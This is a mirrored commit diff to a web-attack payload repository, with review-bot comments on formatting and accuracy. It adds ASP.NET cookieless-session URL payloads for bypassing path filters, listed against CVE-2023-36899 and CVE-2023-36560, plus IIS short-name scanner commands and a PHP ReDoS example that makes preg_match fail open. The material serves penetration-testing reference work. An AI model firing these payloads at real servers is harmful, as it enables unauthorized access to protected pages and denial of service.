mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
ASP Cookieless + ReDOS backtrack
This commit is contained in: parent 67adf75bc2, commit ded1d95735
2 changed files with 75 additions and 7 deletions
@ -14,6 +14,7 @@
* [UNC Bypass](#unc-bypass)
* [NGINX/ALB Bypass](#nginxalb-bypass)
* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
* [IIS Short Name](#iis-short-name)
* [Path Traversal](#path-traversal)
* [Interesting Linux files](#interesting-linux-files)
* [Interesting Windows files](#interesting-windows-files)
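Review bot: the new entry `* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)` links to a heading that is not part of this hunk, so check that the section heading slugs to exactly `aspnet-cookieless-bypass` (a heading written `ASP.NET Cookieless Bypass` also produces that slug on GitHub, because punctuation is dropped, but any other wording leaves the TOC link dead). Its position between `NGINX/ALB Bypass` and `IIS Short Name` is consistent with the section being inserted ahead of `### IIS Short Name` in the body, so the ordering is fine.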
@ -110,12 +111,49 @@ When cookieless session state is enabled. Instead of relying on a cookie to iden
For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.
| .NET Version | URI |
| -------------- | -------------------------- |
| V1.0, V1.1 | /(XXXXXXXX)/ |
| V2.0+ | /(S(XXXXXXXX))/ |
| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ |
| V2.0+ | ... |
We can use this behavior to bypass filtered URLs.
```powershell
* If your application is in the main folder
```ps1
/(S(X))/
/(Y(Z))/
/(G(AAA-BBB)D(CCC=DDD)E(0-1))/
/(S(X))/admin/(S(X))/main.aspx
/(S(x))/b/(S(x))in/Navigator.dll
```
* If your application is in a subfolder
```ps1
/MyApp/(S(X))/
/admin/(S(X))/main.aspx
/admin/Foobar/(S(X))/../(S(X))/main.aspx
/(S(X))/admin/(S(X))/main.aspx
```
| CVE | Payload |
| -------------- | ---------------------------------------------- |
| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx |
| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx |
| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ |
### IIS Short Name
* [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)
```ps1
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
```
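Review bot: the fence opened by ```` ```powershell ```` right after `We can use this behavior to bypass filtered URLs.` is a stray opener: the following lines are the `* If your application is in the main folder` bullet and a second opener ```` ```ps1 ````, so in rendered Markdown the bullet and the `ps1` line become code text and the first bare ```` ``` ```` closes the `powershell` fence, leaving the "main folder" payloads without a block of their own. Drop the ```` ```powershell ```` line so both cases render as a bullet followed by a `ps1` fence, exactly as the `* If your application is in a subfolder` case already does. Two smaller points on the tables: the `.NET Version` table ends with a placeholder row `| V2.0+ | ... |` that should either list the remaining prefixes or be removed, and in the CVE table the `-` rows appear to belong to the `CVE-2023-36899` / `CVE-2023-36560` rows above them, so repeat the CVE ID (or say the `-` means "same as above") and state that these IDs are the fixes, i.e. the payloads need an unpatched target, otherwise a reader cannot tell what the IDs are doing next to the paths.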
@ -236,3 +274,4 @@ The following log files are controllable and can be included with an evil payloa
* [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)
* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U)
* [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - 06/24/2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))
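Review bot: the two new reference entries are inconsistent with each other and with the surrounding list: `Cookieless ASPNET - Soroush Dalili` carries no date at all, the Microsoft entry uses the ambiguous `06/24/2011`, and the existing `TheLaluka` entry in the context lines uses `30 nov. 2023`. Add a date to the Dalili tweet entry and put both new dates in the same unambiguous form as the neighbouring entry so the list stays uniform; the Microsoft link points at a `previous-versions` page, so it is also worth keeping the title and date precise enough that the article can be found again if that URL goes away.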
@ -30,7 +30,36 @@ Evil Regex contains:
These regular expressions can be exploited with `aaaaaaaaaaaaaaaaaaaaaaaa!`
### Backtrack Limit
Backtracking in regular expressions occurs when the regex engine tries to match a pattern and encounters a mismatch. The engine then backtracks to the previous matching position and tries an alternative path to find a match. This process can be repeated many times, especially with complex patterns and large input strings.
PHP PCRE configuration options
| Name | Default | Note |
|----------------------|---------|---------|
| pcre.backtrack_limit | 1000000 | 100000 for `PHP < 5.3.7`|
| pcre.recursion_limit | 100000 | / |
| pcre.jit | 1 | / |
Sometimes it is possible to force the regex to exceed more than 100 000 recursions which will cause a ReDOS and make `preg_match` returning false:
```php
$pattern = '/(a+)+$/';
$subject = str_repeat('a', 1000) . 'b';
if (preg_match($pattern, $subject)) {
echo "Match found";
} else {
echo "No match";
}
```
## References
* [Regular expression Denial of Service - ReDoS - OWASP - Adar Weidman](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
* [PHP Manual > Function Reference > Text Processing > PCRE > Installing/Configuring > Runtime Configuration](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit)
* [Intigriti Challenge 1223 - HACKBOOK OF A HACKER](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
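Review bot: the sentence `force the regex to exceed more than 100 000 recursions` conflates the two limits in the table just above it: 100000 is `pcre.recursion_limit`, but the example `/(a+)+$/` against `str_repeat('a', 1000) . 'b'` blows up through backtracking, which is governed by `pcre.backtrack_limit` (1000000), and with the table's own default `pcre.jit = 1` the recursion limit is ignored entirely and the failure normally surfaces as `PREG_JIT_STACKLIMIT_ERROR`. Say which limit is being exhausted and have the `else` branch print `preg_last_error()` (or `preg_last_error_msg()` on PHP 8) so the reader can see that the `No match` output comes from `preg_match` returning `false`, not `0`. That distinction is the entire point of the section and it is left implicit: `if (preg_match($pattern, $subject))` treats `false` exactly like a genuine non-match, so a deny-list check written this way silently lets the crafted input through; the text should state that and recommend comparing with `=== 1` / `=== 0` plus an error check as the fix.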